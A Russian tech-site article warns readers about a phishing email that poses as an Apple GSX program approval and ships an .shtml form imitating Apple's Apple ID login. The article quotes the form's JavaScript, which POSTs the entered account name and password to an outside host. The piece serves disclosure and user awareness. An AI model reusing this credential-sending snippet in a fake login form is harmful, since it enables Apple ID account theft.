На ваш почтовый ящик часто приходит спам? Он бывает разный: рекламный, с просьбой о помощи каким-то неведомым африканским товарищам, попавшим в сложную финансовую ситуацию, рассылка из сервисов… Сегодня на почтовый адрес нашей редакции пришло любопытное письмо… от Apple.
Вернее, так можно было подумать на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же понятно, что это фейковый почтовый адрес, цель которого — получение пароля и логина от Apple ID.
Само письмо выглядит следующим образом:
Из короткого сообщения мы узнали, что наша заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что нужно для активации — загрузить прилагающийся архив и ввести данные Apple ID в прилагающейся форме.
Самое интересно в том, что никакой заявки на участие в GSX ни один из членов нашей редакции не подавал.
GSX — это специализированный инструмент, который Apple выдает ограниченному кругу специалистов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе используется iOS Diagnostics Apple, либо магазин-посредник, который позволяет связать с устройством клиента для получения необходимой информации.
Полученное письмо действительно выглядит правдоподобно: кратко, по делу, с подтверждением заявки и главной — адрес отправителя. Весьма реалистичный адрес gsx_notifications@apple.com — в том же домене, что и Apple и без дополнительных приписок.
Внутри архива есть единственный файл в формате *.shtml. Открываем — обычная форма, которая полностью совпадает с оригиналом от Apple:
Разумеется, вводить Apple ID в подозрительное окно мы не стали.
В прикрепленном файле был обнаружен следующий код:
[jscript]
xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true);
xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′);
xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);
[/jscript]
Он передает логин и пароль на сайт nubetelstore.com
В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы сообщим им об этой проблеме.
Хозяева сайта скорее всего не знают о том, что он используется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого показал, что он возможно был написан людьми, которые не думали о безопасности и делали по принципу: «Чтобы работало». С большой вероятностью nublestore.com был взломан и используется мошенниками без ведома его владельцев.
Как выяснилось, полученное нами письмо — распространенный вариант фишинга, который от имени gsx_notifications@apple.com действует с февраля месяца. Достаточно ввести данные своего аккаунта, как вы тут же попадаетесь на крючок злоумышленника и полностью теряете контроль на своим аккаунтом.
Будьте внимательны и никогда не вводите данные своей учетной записи в подозрительные формы. Фишинг — штука тонкая и адрес gsx_notifications@apple.com выглядел весьма правдоподобно. Если бы кто-то из нашей большой команды сайта действительно подавал заявку на участие в Global Service Exchange, подвоха мы сразу могли бы и не заметить.
20 комментариев